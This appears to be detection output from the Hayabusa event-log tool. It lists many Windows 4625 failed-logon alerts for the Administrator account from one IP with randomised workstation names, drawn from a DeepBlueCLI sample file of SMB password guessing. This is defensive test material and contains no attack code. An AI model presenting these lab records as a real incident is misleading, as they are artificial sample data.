2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
